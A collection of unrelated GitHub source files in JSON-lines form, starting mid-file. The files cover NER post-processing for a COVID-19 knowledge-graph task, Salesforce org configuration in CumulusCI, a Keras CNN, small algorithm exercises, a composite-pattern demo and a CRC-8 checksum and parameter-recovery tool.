range(8):\n # sent_list.append({'context': line['context'], 'entity': line['label'], 'entity_str': line['label_entity']})\n sent_list.append({'context': line['context'], 'entity': line['label']})\n result = []\n submit_entity_prob = []\n submit = []\n sents = []\n\n index_sent = 0\n\n print(len(sent_list))\n print(len(span_triple_lst))\n\n for sent, triple in zip(sent_list, span_triple_lst):\n index_sent += 1\n # if index_sent > 1000:\n # break\n # 获取真实实体\n if len(triple) is 0:\n continue\n tag = triple[0]['tag']\n query_len = type_len[tag]\n\n # 获取预测的实体\n bert_ins = tokenizer.tokenize(sent['context'])\n\n entity_prob = []\n # entity_nest = []\n\n # !! 
使用规则的方式匹配实体\n # 第一步,首先将被切分成多个片段的实体组合成一个完整的实体片段\n # for i in triple:\n # # 使用规则删除重叠实体\n # # if i['begin'] in entity_nest:\n # # continue\n # # 使用规则删除过长的片段\n # # if i['end'] - i['begin'] > 40:\n # # continue\n # # entity_nest.append(i['begin'])\n #\n # entity = bert_ins[i['begin'] - query_len - 2: i['end'] - query_len - 2]\n # span_true = []\n # flag = False\n #\n # for index in range(len(entity)):\n # if index == 0:\n # span_true.append(entity[index])\n # elif \"##\" in entity[index]:\n # # 带有 ## 的片段和前面的片段进行拼接\n # span_true.append(span_true.pop() + entity[index].replace(\"##\", ''))\n # elif \"-\" is entity[index]:\n # # 带有 - 的片段和前后两个片段进行组合\n # span_true.append(span_true.pop() + entity[index] + entity[index + 1])\n # flag = True\n # elif flag:\n # flag = False\n # else:\n # span_true.append(entity[index])\n # span_true = ' '.join(span_true)\n #\n # # 解决括号不匹配问题\n # # if span_true.count(\"(\") != span_true.count(\")\"):\n # # continue\n # if not is_match(span_true):\n # continue\n #\n # entity_prob.append(span_true)\n\n # !! 使用正则表达式的方式匹配实体\n for i in triple:\n entity = bert_ins[i['begin'] - query_len - 2: i['end'] - query_len - 2]\n\n entity_span_list = []\n for spans in entity:\n entity_span_list.append(\n spans.replace(')', \"\\)\").replace('(', \"\\(\") \\\n .replace('$', \"\\$\").replace('?', \"\\?\").replace('*', \"\\*\") \\\n .replace('+', \"\\+\").replace('.', \"\\.\").replace('[', \"\\[\") \\\n .replace('{', \"\\{\").replace('|', \"\\|\").replace('^', \"\\^\") \\\n .replace('##', \"\")\n )\n span_true = '\\s*'.join(entity_span_list)\n\n # 解决括号不匹配问题\n if not is_match(span_true):\n continue\n\n pattern = re.compile(span_true)\n\n entity_prob.append(pattern)\n # result.append({'context': sent['context'], 'tag': tag, 'entity_truth': sent['entity_str'][tag], 'entity_prob': entity_prob})\n result.append({'context': sent['context'], 'tag': tag, 'entity_prob': entity_prob})\n\n # with open('results.json', 'w', encoding = 'utf-8') as file_obj:\n # json.dump(result, file_obj,ensure_ascii=False, indent=4)\n # print(len(result))\n\n sents = []\n submit_entity_prob = []\n # 第二部,按标准答案的要求,修改定位实体位置的标签\n for result_ in result:\n\n # 首先拿到所需内容\n ins = result_['context']\n tag = result_['tag']\n entity_prob = result_['entity_prob']\n\n ins_lower = ins.lower()\n\n remeber = []\n # 将原始句子中的词全部变成小写,然后查找实体在句子中的位置\n for entity in entity_prob:\n # 去掉重复片段\n if entity in remeber:\n break\n remeber.append(entity)\n for i in re.finditer(entity, ins_lower):\n start = i.start()\n end = i.end()\n # {\"entity\": \"tetanus\", \"type\": \"Disease\", \"start\": 14, \"end\": 21}\n submit_entity_prob.append(\n {\"entity\": ins[start: end], \"type\": tag, \"start\": start, \"end\": end})\n\n # if len(sents) == 0:\n # sents.append(ins)\n # submit.append({'text': ins, 'entities': submit_entity_prob})\n # if ins not in sents:\n # if len(sents) > 0:\n # submit.append({'text': sents.pop(), 'entities': submit_entity_prob})\n # submit_entity_prob = []\n # sents.append(ins)\n\n if ins not in sents:\n submit.append({'text': ins, 'entities': submit_entity_prob})\n sents.append(ins)\n submit_entity_prob = []\n else:\n submit[-1]['entities'] += submit_entity_prob\n submit_entity_prob = []\n\n with open('submit.json', 'w', encoding = 'utf-8') as file_obj:\n json.dump(submit, file_obj, ensure_ascii=False, indent=4)\n print(len(submit))\n\n\n# 利用有标数据构建一个实体知识图谱\ndef generate_kg():\n kg_entity = set()\n file_path = '../origin_data/new_train.json'\n fr = open(file_path, 'r', encoding='utf-8')\n\n for line in fr:\n line = json.loads(line)\n 
entities = line['entities']\n for entity in entities:\n kg_entity.add((entity['entity'], entity['type']))\n\n with open('kg.json', 'w', encoding = 'utf-8') as file_obj:\n json.dump(list(kg_entity), file_obj, ensure_ascii=False, indent=4)\n\n\n# 将知识图谱对齐测试集得到一定数量的实体\ndef kg_find_entity():\n file_path = 'kg.json'\n fr = open(file_path, 'r', encoding='utf-8')\n kg_entitys = json.load(fr)\n return kg_entitys\n\n\n# 最终处理成提交格式,将句子改为和原始数据对应的句子\ndef generate_submit():\n fr3 = open('val_test.json', 'r', encoding='utf-8')\n sentence = json.load(fr3)\n fr4 = open('submit.json', 'r', encoding='utf-8')\n submit = json.load(fr4)\n fw5 = open('submit_on_system_10_29.json', 'w', encoding='utf-8')\n # {\"text\": \"Molecular diagnostics for sleeping sickness: what is the benefit for the patient?\\tSleeping\n # \"entities\": [{\"entity\": \"entity\", \"type\": \"type\", \"start\": 1, \"end\": 2},\n # {\"entity\": \"entity\", \"type\": \"type\", \"start\": 1, \"end\": 2}]}\n\n # for tuple in submit:\n # for sent in sentence:\n # if sent['context'].replace('\\t', '.') == tuple['text']:\n # f.write(str({\"text\": sent['context'], \"entities\": tuple['entities']}) + '\\n')\n # del (sentence[0])\n # break\n\n kg_entitys = kg_find_entity()\n # sentence = sentence[:20]\n for sent in sentence:\n dict = {\"text\": sent['context'], \"entities\": []}\n for tuple in submit:\n if sent['context'].replace('\\t', '.') == tuple['text']:\n dict[\"entities\"] += tuple['entities']\n # if len(tuple['entities']) is not 0:\n submit.remove(tuple)\n break\n context_list = list(sent['context'])\n for entity_str in kg_entitys:\n entity = entity_str[0]\n tag = entity_str[1]\n if tag in ['Drug', 'Phenotype']:\n continue\n if entity in sent['context']:\n for i in re.finditer(entity, sent['context']):\n start = i.start()\n end = i.end()\n # {\"entity\": \"tetanus\", \"type\": \"Disease\", \"start\": 14, \"end\": 21}\n if start - 1 > 0 and end < len(context_list):\n if sent['context'][start - 1] is ' ' and sent['context'][end] is ' ':\n if {\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end} not in dict['entities']:\n dict['entities'].append({\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end})\n elif start == 0 and end < len(sent['context']):\n if sent['context'][end] is ' ':\n if {\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end} not in dict['entities']:\n dict['entities'].append({\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end})\n elif start - 1 > 0 and end == len(sent['context']):\n if sent['context'][start - 1] is ' ':\n if {\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end} not in dict['entities']:\n dict['entities'].append({\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end})\n else:\n continue\n # pattern = re.compile(\"\\s{1}\\(?\" + entity + '\\)?\\s{1}')\n # for i in re.finditer(pattern, sent['context']):\n # start = i.start()\n # end = i.end()\n # start_pos = start\n # end_pos = end\n # # 对正则表达式匹配出的位置进行修改\n # if sent['context'][start] in [' ', '(', '\\t']:\n # start_pos = start + 1\n # if sent['context'][start + 1] in [' ', '(', '\\t']:\n # start_pos = start + 2\n # if sent['context'][end - 1] in [' ', '(', '\\t']:\n # end_pos = end - 1\n # if sent['context'][end - 2] in [' ', '(', '\\t']:\n # end_pos = end - 2\n #\n # if {\"entity\": sent['context'][start_pos: end_pos], \"type\": tag, \"start\": start_pos, 
\"end\": end_pos} not in dict['entities']:\n # dict['entities'].append({\"entity\": sent['context'][start_pos: end_pos], \"type\": tag, \"start\": start_pos, \"end\": end_pos})\n data = json.dumps(dict, ensure_ascii=False)\n if len(dict['entities']) is not 0:\n fw5.write(data + '\\n')\n\n fw5.close()\n print('保存成功')\n\n\ndef caculate_query_len():\n fr = open('../query/en_ccks_covid19.json', 'r', encoding='utf-8')\n\n type_dict = json.load(fr)\n\n type_dict = type_dict['default']\n type_len = {}\n for key, value in type_dict.items():\n type_len[key] = len(tokenizer.tokenize(value))\n\n print(type_len)\n\n\ntype_len = {'Disease': 19, 'Phenotype': 18, 'Drug': 28, 'ChemicalCompound': 9, 'Gene': 11, 'Virus': 23, 'Organization': 14, 'Chemical': 8}\n\n\nif __name__ == '__main__':\n # caculate_vocab_num()\n # caculate_sent_num()\n # caculate_sent_num_for_bert()\n generate_process_data()\n # generate_result()\n # generate_submit()\n # caculate_query_len()\n\n # 知识图谱补充\n # generate_kg()\n\n\n\n\n\n\n","repo_name":"JavaStudenttwo/BERT_MRC","sub_path":"data_dir/KG_Covid19_Task1/process/origin_process.py","file_name":"origin_process.py","file_ext":"py","file_size_in_byte":21283,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"37"} +{"seq_id":"71302260266","text":"from __future__ import print_function\n\nimport os, sys\n\nTHREADS_LIMIT = 1\nos.environ['MKL_NUM_THREADS'] = str(THREADS_LIMIT)\nos.environ['NUMEXPR_NUM_THREADS'] = str(THREADS_LIMIT)\nos.environ['OMP_NUM_THREADS'] = str(THREADS_LIMIT)\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.metrics\nimport time\nimport pickle\n\nos.environ['MPLBACKEND'] = 'agg'\nimport vip_hci as vip\n\nimport multiprocessing\n\nfrom datasets import loader\n# from tqdm import tqdm\n\nfrom grmf import GRMF\nfrom pca import PCA\n\nfrom util import cube_collapse, cube_expand, annulus_mapping\nfrom perf_assess import perf_assess_gomez2017\n\n\ndef hms_string(sec_elapsed):\n h = int(sec_elapsed / (60 * 60))\n m = int((sec_elapsed % (60 * 60)) / 60)\n s = sec_elapsed % 60.\n if h > 0:\n return \"{}h{:>02}m{:>05.2f}s\".format(h, m, s)\n elif m > 0:\n return \"{:>02}m{:>05.2f}s\".format(m, s)\n else:\n return \"{:>05.2f}s\".format(s)\n \n\ndef run_perf_assess(\n dataset='bpic_naco_empty',\n cube_size=50, tscale=1., xscale=1.,\n n_samples_per_res=5, sep_from=1., sep_to=4., flevel_from=50, flevel_to=200,\n seed=0, n_jobs=None,\n prad=1., model=None, opts=dict(),\n):\n dataset_name = dataset\n model_name = model\n \n if n_jobs is None:\n n_jobs = max(1, (multiprocessing.cpu_count() - 4)/THREADS_LIMIT)\n \n if model is None:\n print(\"Please provide a model\")\n exit(1)\n \n \n ### MODEL LOADING ###\n\n n_samples = int(n_samples_per_res * 4 * (sep_to**2 - sep_from**2))\n model = globals()[model_name](**opts)\n \n \n ### DATASET LOADING ###\n \n # Load data\n dataset = loader(dataset_name)\n print(\"Loaded dataset {}\".format(dataset_name))\n \n # Rescale, possibly\n if xscale != 1. 
or tscale != 1.:\n dataset = dataset.resample(spatial=xscale, temporal=tscale)\n print(\"Cube resampled by factors {} (spatially) and {} (temporally)\".format(xscale, tscale))\n \n # Resize\n dataset = dataset.resize(cube_size)\n print(\"Cube resized to ({}, {})\".format(*dataset.cube.shape[1:]))\n \n \n ### WRITING HEADER ###\n\n params = dict(\n dataset=dataset_name,\n cube_size=cube_size,\n tscale=tscale,\n xscale=xscale,\n \n n_samples=n_samples,\n sep_from=sep_from,\n sep_to=sep_to,\n flevel_from=flevel_from,\n flevel_to=flevel_to,\n seed=seed,\n \n model=model_name,\n opts=opts,\n )\n \n output_filename = 'perf/{}_gomez2017_{}.pkl'.format(thetime, params['model'])\n print(\"Writing results to \\\"{}\\\"\".format(output_filename))\n \n \n ### DATA COLLECTION ###\n \n start_time = time.time()\n\n print()\n print(\"Starting data collection on loaded dataset, with parameters:\")\n print(\" - Samples {}\".format(n_samples))\n print(\" - Annulus {}--{} (FWHM)\".format(sep_from, sep_to))\n print(\" - Injected flux level {}--{}\".format(flevel_from, flevel_to))\n print(\" - Model \\\"{}\\\"\".format(\n type(model).__name__\n ))\n print(\" with parameters: {}\".format(\n ', '.join('{}={}'.format(k, repr(v)) for (k, v) in opts.iteritems())\n ))\n print(\" - Random seed {}\".format(seed))\n print(\" - Nbr of parallel processes {}\".format(n_jobs))\n print()\n \n negatives, positives = perf_assess_gomez2017(\n dataset, n_samples, [sep_from, sep_to], [flevel_from, flevel_to],\n model,\n random_state=seed,\n n_jobs=n_jobs, verbose=10\n )\n \n with open(output_filename, 'w') as f:\n pickle.dump(params, f)\n pickle.dump(negatives, f)\n pickle.dump(positives, f)\n \n stop_time = time.time()\n \n print()\n print(\"Finished\")\n print(\"Elapsed time: {}\".format(hms_string(stop_time-start_time)))\n\n\nif __name__ == '__main__':\n \n thetime = time.strftime(\"%Y%m%d-%H%M%S\")\n \n ### CONFIGURATION ###\n \n # Default params\n params = dict(\n dataset='bpic_naco_empty',\n cube_size=50,\n tscale=1.,\n xscale=1.,\n\n n_samples_per_res=5,\n sep_from=1.,\n sep_to=4.,\n flevel_from=50,\n flevel_to=200,\n seed=0,\n )\n \n # Read from STDIN if available\n if len(sys.argv) > 1:\n if sys.argv[1] == 'stdin':\n p = pickle.load(sys.stdin)\n params.update(p)\n \n # Otherwise, use local config\n else:\n \n ### CHANGE STUFF HERE ###\n params['opts'] = dict(\n rank=17\n )\n params['model'] = 'PCA'\n #########################\n \n run_perf_assess(**params)\n \n","repo_name":"xlambein/lambein-remove-2019","sub_path":"perf_assess_gomez2017.py","file_name":"perf_assess_gomez2017.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42092375752","text":"n = int(input())\ndata = sorted(list(map(int, input().split())))\ngroup = 0 # 총 그룹의 수\n\ncount = 0 # 현재 그룹에 포함된 모험가의 수\nfor d in data:\n count += 1\n if d <= count:\n group += 1\n count = 0\n\nprint(group)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"study-demo/greedy/solution7.py","file_name":"solution7.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14547988944","text":"import os\n\nimport requests\n\nfrom simple_salesforce import Salesforce\n\nfrom cumulusci.core.config import BaseConfig\nfrom cumulusci.core.exceptions import SalesforceCredentialsException\nfrom cumulusci.oauth.salesforce import SalesforceOAuth2\nfrom cumulusci.oauth.salesforce 
import jwt_session\n\n\nSKIP_REFRESH = os.environ.get(\"CUMULUSCI_DISABLE_REFRESH\")\n\n\nclass OrgConfig(BaseConfig):\n \"\"\" Salesforce org configuration (i.e. org credentials) \"\"\"\n\n # make sure it can be mocked for tests\n SalesforceOAuth2 = SalesforceOAuth2\n\n def __init__(self, config, name):\n self.name = name\n self._community_info_cache = {}\n self._client = None\n self._latest_api_version = None\n super(OrgConfig, self).__init__(config)\n\n def refresh_oauth_token(self, keychain, connected_app=None):\n if not SKIP_REFRESH:\n SFDX_CLIENT_ID = os.environ.get(\"SFDX_CLIENT_ID\")\n SFDX_HUB_KEY = os.environ.get(\"SFDX_HUB_KEY\")\n if SFDX_CLIENT_ID and SFDX_HUB_KEY:\n info = jwt_session(\n SFDX_CLIENT_ID, SFDX_HUB_KEY, self.username, self.instance_url\n )\n else:\n info = self._refresh_token(keychain, connected_app)\n if info != self.config:\n self.config.update(info)\n self._load_userinfo()\n self._load_orginfo()\n\n def _refresh_token(self, keychain, connected_app):\n if keychain: # it might be none'd and caller adds connected_app\n connected_app = keychain.get_service(\"connected_app\")\n if connected_app is None:\n raise AttributeError(\n \"No connected app or keychain was passed to refresh_oauth_token.\"\n )\n client_id = self.client_id\n client_secret = self.client_secret\n if not client_id:\n client_id = connected_app.client_id\n client_secret = connected_app.client_secret\n sf_oauth = self.SalesforceOAuth2(\n client_id,\n client_secret,\n connected_app.callback_url, # Callback url isn't really used for this call\n auth_site=self.instance_url,\n )\n\n resp = sf_oauth.refresh_token(self.refresh_token)\n if resp.status_code != 200:\n raise SalesforceCredentialsException(\n f\"Error refreshing OAuth token: {resp.text}\"\n )\n return resp.json()\n\n @property\n def lightning_base_url(self):\n return self.instance_url.split(\".\")[0] + \".lightning.force.com\"\n\n @property\n def salesforce_client(self):\n if not self._client:\n self._client = Salesforce(\n instance=self.instance_url.replace(\"https://\", \"\"),\n session_id=self.access_token,\n version=\"45.0\",\n )\n return self._client\n\n @property\n def latest_api_version(self):\n if not self._latest_api_version:\n response = self.salesforce_client._call_salesforce(\n \"GET\", f\"https://{self.salesforce_client.sf_instance}/services/data\"\n )\n self._latest_api_version = str(response.json()[-1][\"version\"])\n return self._latest_api_version\n\n @property\n def start_url(self):\n start_url = \"%s/secur/frontdoor.jsp?sid=%s\" % (\n self.instance_url,\n self.access_token,\n )\n return start_url\n\n @property\n def user_id(self):\n return self.id.split(\"/\")[-1]\n\n @property\n def org_id(self):\n return self.id.split(\"/\")[-2]\n\n @property\n def username(self):\n \"\"\" Username for the org connection. 
\"\"\"\n username = self.config.get(\"username\")\n if not username:\n username = self.userinfo__preferred_username\n return username\n\n def load_userinfo(self):\n self._load_userinfo()\n\n def _load_userinfo(self):\n headers = {\"Authorization\": \"Bearer \" + self.access_token}\n response = requests.get(\n self.instance_url + \"/services/oauth2/userinfo\", headers=headers\n )\n if response != self.config.get(\"userinfo\", {}):\n self.config.update({\"userinfo\": response.json()})\n\n def can_delete(self):\n return False\n\n def _load_orginfo(self):\n headers = {\"Authorization\": \"Bearer \" + self.access_token}\n self._org_sobject = requests.get(\n self.instance_url\n + f\"/services/data/v45.0/sobjects/Organization/{self.org_id}\",\n headers=headers,\n ).json()\n result = {\n \"org_type\": self._org_sobject[\"OrganizationType\"],\n \"is_sandbox\": self._org_sobject[\"IsSandbox\"],\n }\n self.config.update(result)\n\n @property\n def organization_sobject(self):\n return self._org_sobject\n\n def _fetch_community_info(self):\n \"\"\"Use the API to re-fetch information about communities\"\"\"\n headers = {\"Authorization\": \"Bearer \" + self.access_token}\n response = requests.get(\n self.instance_url + \"/services/data/v45.0/connect/communities\",\n headers=headers,\n ).json()\n\n # Since community names must be unique, we'll return a dictionary\n # with the community names as keys\n result = {community[\"name\"]: community for community in response[\"communities\"]}\n return result\n\n def get_community_info(self, community_name, force_refresh=False):\n \"\"\"Return the community information for the given community\n\n An API call will be made the first time this function is used,\n and the return values will be cached. Subsequent calls will\n not call the API unless the requested community name is not in\n the cached results, or unless the force_refresh parameter is\n set to True.\n\n \"\"\"\n\n if force_refresh or community_name not in self._community_info_cache:\n self._community_info_cache = self._fetch_community_info()\n\n if community_name not in self._community_info_cache:\n raise Exception(\n f\"Unable to find community information for '{community_name}'\"\n )\n\n return self._community_info_cache[community_name]\n","repo_name":"justindixon/CumulusCI","sub_path":"cumulusci/core/config/OrgConfig.py","file_name":"OrgConfig.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"19567195321","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\n\n\n\nbatch_size = 16\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(250, 250, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(3))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='rmsprop',\n 
metrics=['accuracy'])\n\nmodel.summary()\n\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\nvalidation_generator = test_datagen.flow_from_directory(\n 'dataset/val',\n target_size=(250, 250),\n batch_size=batch_size,\n class_mode='categorical')\n\n\n\n\ntrain_generator = train_datagen.flow_from_directory(\n 'dataset/train', # this is the target directory\n target_size=(250, 250), # all images will be resized to 250x250\n batch_size=batch_size,\n class_mode='categorical')\n\nhistory_1 = model.fit_generator(\n train_generator,\n steps_per_epoch=2000 // batch_size,\n epochs=15,\n validation_data=validation_generator,\n validation_steps=800 // batch_size)\n\nfig = plt.figure()\nfig.set_size_inches(15, 15)\ngs = gridspec.GridSpec(3, 2, figure=fig)\nax1 = fig.add_subplot(gs[0, 0])\n\nax1.plot(history_1.history['loss'])\nax1.plot(history_1.history['val_loss'])\nplt.title('Model Loss for vanilla CNN')\nax1.set_ylabel('Loss')\n\nax2 = fig.add_subplot(gs[0, 1])\nax2.plot(history_1.history['accuracy'])\nax2.plot(history_1.history['val_accuracy'])\nplt.title('Model Accuracy for vanilla CNN')\nax2.set_ylabel('Accuracy')\n\nplt.show()\n\n#model_json = model.to_json()\n#with open(\"model.json\", \"w\") as json_file:\n# json_file.write(model_json)\nmodel.save('model.h5')\n","repo_name":"vonschtirlitz/weapon_cnn","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71121470188","text":"# 11387. Monster hunting\n\ndef damage(n):\n global D, L\n global result\n dam = D + D*n*L/100\n result += dam\n\n\nT = int(input())\nfor t in range(1, T+1):\n # base damage, percent increase per hit, number of hits\n D, L, N = map(int, input().split())\n result = 0\n for i in range(N):\n damage(i)\n print('#%d %d'%(t, round(result)))\n","repo_name":"haesungbang/Algorithm","sub_path":"swea/d_3/0502_11387.py","file_name":"0502_11387.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74548926186","text":"# -*- coding: utf-8 -*-\n# @Author : Xu Bai\n# @Time : 2022/6/6 7:40 PM\n# @Desc :\nfrom abc import ABCMeta, abstractmethod\n\nprint(\"\"\"\nUse cases:\n Representing a 'part-whole' hierarchy of objects (especially when the structure is recursive)\n Letting users ignore the difference between composite and individual objects and handle all objects in the composite structure uniformly\nAdvantages:\n Defines a hierarchy that contains both primitive and composite objects\n Simplifies client code, which can treat composite and individual objects uniformly\n Makes it easier to add new kinds of components\n------------------------------------------------------------------\n\"\"\")\n\n\nclass Graphic(metaclass=ABCMeta):\n @abstractmethod\n def draw(self):\n pass\n\n\n# Simple (leaf) objects\nclass Point(Graphic):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return f'Point({self.x}, {self.y})'\n\n def draw(self):\n print(str(self))\n\n\nclass Line(Graphic):\n def __init__(self, p1, p2):\n self.p1 = p1\n self.p2 = p2\n\n def __str__(self):\n return 'Segment[%s, %s]' % (self.p1, self.p2)\n\n def draw(self):\n print(str(self))\n\n\n# Composite object\nclass Picture:\n def __init__(self, iterable):\n self.children = []\n for g in iterable:\n self.add(g)\n\n def add(self, graphic):\n self.children.append(graphic)\n\n def draw(self):\n print('+-+-+-Composite figure+-+-+-')\n for g in self.children:\n g.draw()\n print('------Composite figure------')\n\n\nl = Line(Point(1, 1), Point(2, 2))\nprint(l)\np1 = Point(2, 3)\nl1 = Line(Point(3, 4), Point(6, 7))\nl2 = Line(Point(1, 5), Point(2, 8))\npic1 = Picture([p1, l1, l2])\npic1.draw()\n
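# Note: pic2 below nests the composite pic1 twice alongside the line l1;\n# Picture.draw() recurses into every child, so pic1's three primitives print twice.\n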
pic2 = Picture([pic1, pic1, l1])\npic2.draw()\n","repo_name":"by777/design_pattern_py","sub_path":"composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32032284261","text":"def D(n):\n div = []\n for i in range(2, int(n**.5) + 1):\n if n % i == 0:\n if i % 2:\n div.append(i)\n if i != n // i and (n // i) % 2:\n div.append(n // i)\n if len(div) < 6:\n return 0, 0\n div.sort(reverse=True)\n return div[5], len(div)\n\n\ncount = 0\nN = 200_000_001\nwhile count != 5:\n w = D(N)\n if w[0] != 0:\n print(w[0], w[1])\n count += 1\n N += 1","repo_name":"ivbachantcev/EGEBurg_2022","sub_path":"ПР17. Числа с заданными свойствами/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6622350575","text":"\"\"\"\n@company: FSVIC\n@author: kindred\n@date: 2021-01-10\n@version: 1.0\n@desc:\n 1 Forward CRC-8 check (direct algorithm)\n 2 CRC-8 check via table lookup\n 3 Generate a CRC-8 lookup table (.CSV)\n 4 Recover the CRC model parameters from two data samples and their CRC values\n\"\"\"\nimport re\nimport os\nimport pandas as pd\nimport multiprocessing\n\n\ndef get_input_data():\n \"\"\"Return the entered hex data as two lists of ints\"\"\"\n data_1 = input('Data 1 (space separated): ')\n data_2 = input('Data 2 (space separated): ')\n byt_1 = [int(i, 16) for i in data_1.split()]\n byt_2 = [int(i, 16) for i in data_2.split()]\n return byt_1, byt_2\n\n\ndef get_log_data():\n \"\"\"Import a log file and extract two frames for the given CAN ID\"\"\"\n data_list = []\n byt1 = []\n byt2 = []\n\n _id = input('Enter the CAN ID (hex): ')\n log = input('Log file path: ') # log_file = r'C:\\Users\\kindred\\Desktop\\logger.asc'\n\n f = open(log, encoding='gbk')\n lines = f.readlines()\n for line in lines[:10000]:\n line_list = line.split()\n try:\n if int(_id, 16) == int(line_list[2], 16):\n _match = re.match(r'.*?Rx.*?\\d (.*?)$', line)\n data_list.append(_match.group(1))\n except ValueError:\n pass\n if len(data_list) >= 2:\n byt1 = [int(i, 16) for i in data_list[0].split(' ')]\n byt2 = [int(i, 16) for i in data_list[1].split(' ')]\n else:\n print(\"Fewer than 2 frames with the selected message in the first 10000 bus records\")\n f.close()\n return byt1, byt2\n\n\ndef data_reverse(data):\n \"\"\"Bit-reverse one byte, used for input/output reflection\"\"\"\n reverse_data = '{:08b}'.format(data)[::-1]\n new_data = int(reverse_data, 2)\n return new_data\n\n\ndef get_crc_value(init, poly, data, refin1, refout1, xorout1):\n \"\"\"Compute the CRC checksum directly\"\"\"\n crc = init\n if refin1:\n data = [data_reverse(m) for m in data]\n for i in range(len(data)): # iterate over the input data\n crc ^= data[i]\n for j in range(8): # process 8 bits\n if crc & 0x80: # check whether the MSB is 1\n crc = (crc << 1) ^ poly # after shifting, XOR with the polynomial\n else:\n crc = crc << 1\n crc = crc & 0xff\n if refout1:\n crc = data_reverse(crc)\n crc = crc ^ xorout1\n return crc\n\n\ndef create_crc_table(_ploy):\n \"\"\"Generate the CRC table for a polynomial\"\"\"\n crc_table = []\n for i in range(256):\n crc = i\n for j in range(8):\n if crc & 0x80: # check whether the MSB is 1\n crc = (crc << 1) ^ _ploy\n else:\n crc = crc << 1\n crc = crc & 0xff\n crc_table.append(crc)\n return crc_table\n\n\ndef get_crctable_csv(crc_table):\n \"\"\"Save the generated CRC table as a CSV file\"\"\"\n total_list = []\n headers = []\n table = []\n for crc in crc_table:\n _crc = '0x' + format(crc & 0xff, '02x') # formatted output\n total_list.append(_crc) # append to the list\n for n in range(0, len(total_list), 16): # split the list into rows of length 16\n table.append(total_list[n:n + 16])\n for h in range(16): # build the header row for the CSV export\n headers.append(h)\n writer = pd.DataFrame(columns=headers, data=table)\n if not os.path.exists('file'):\n os.mkdir('file')\n writer.to_csv('file/CRC_Table.csv', index=False, header=False) # write the CSV file without header or index\n\n
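# Sanity check (illustrative): for the standard CRC-8 model (poly=0x07, init=0x00, no\n# reflection, xorout=0x00) the check value of b\"123456789\" is 0xF4, i.e.\n# get_crc_value(0x00, 0x07, [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39], False, False, 0x00) == 0xF4\n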
\ndef table_method(crctable, data, init, refin1, refout1, xorout1):\n \"\"\"Compute the CRC value via table lookup\"\"\"\n crc = init\n if refin1:\n data = [data_reverse(m) for m in data]\n for i in range(len(data)):\n crc = crctable[crc ^ data[i]]\n if refout1:\n crc = data_reverse(crc)\n crc = crc ^ xorout1\n print(\"CRC value (table lookup):\", hex(crc))\n\n\ndef reverse_crc_1(data1, data2, crc1, crc2):\n \"\"\"Recover the CRC polynomial and initial value from two data samples and their CRCs,\n with input and output reflection\n \"\"\"\n for _poly in range(256): # polynomial range\n for i in range(256): # initial value range\n for xorout in range(256):\n if get_crc_value(i, _poly, data1, True, True, xorout) == crc1: # verify against sample 1\n if get_crc_value(i, _poly, data2, True, True, xorout) == crc2:\n _f = open('file/reverse_crc_1.txt', 'a', encoding='utf-8')\n _f.write(\"Polynomial: 0x{:02x}\\n\".format(_poly))\n _f.write(\"Initial value: 0x{:02x}\\n\".format(i))\n _f.write(\"Input reflected: True\\n\")\n _f.write(\"Output reflected: True\\n\")\n _f.write(\"Final XOR value: 0x{:02x}\\n\".format(xorout))\n _f.write(\"------------\\n\")\n _f.close()\n\n\ndef reverse_crc_2(data1, data2, crc1, crc2):\n \"\"\"Recover the CRC polynomial and initial value from two data samples and their CRCs,\n input reflected, output not reflected\n \"\"\"\n for _poly in range(256): # polynomial range\n for i in range(256): # initial value range\n for xorout in range(256):\n if get_crc_value(i, 